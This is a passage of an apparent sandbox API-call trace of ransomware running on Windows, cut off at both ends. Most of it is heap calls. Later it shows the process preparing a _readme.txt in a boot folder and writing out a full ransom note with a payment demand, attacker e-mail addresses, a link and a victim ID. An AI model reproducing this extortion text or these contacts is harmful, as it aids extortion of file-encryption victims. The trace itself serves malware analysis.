0x3b65058 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.759] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0200.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.759] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.759] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.759] PathFindFileNameW (pszPath="") returned="" [0200.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.759] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.769] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.769] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.769] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0200.769] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0200.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.769] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0200.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.770] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.770] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.771] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.771] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.771] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.771] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.771] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0200.771] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0200.771] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.772] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 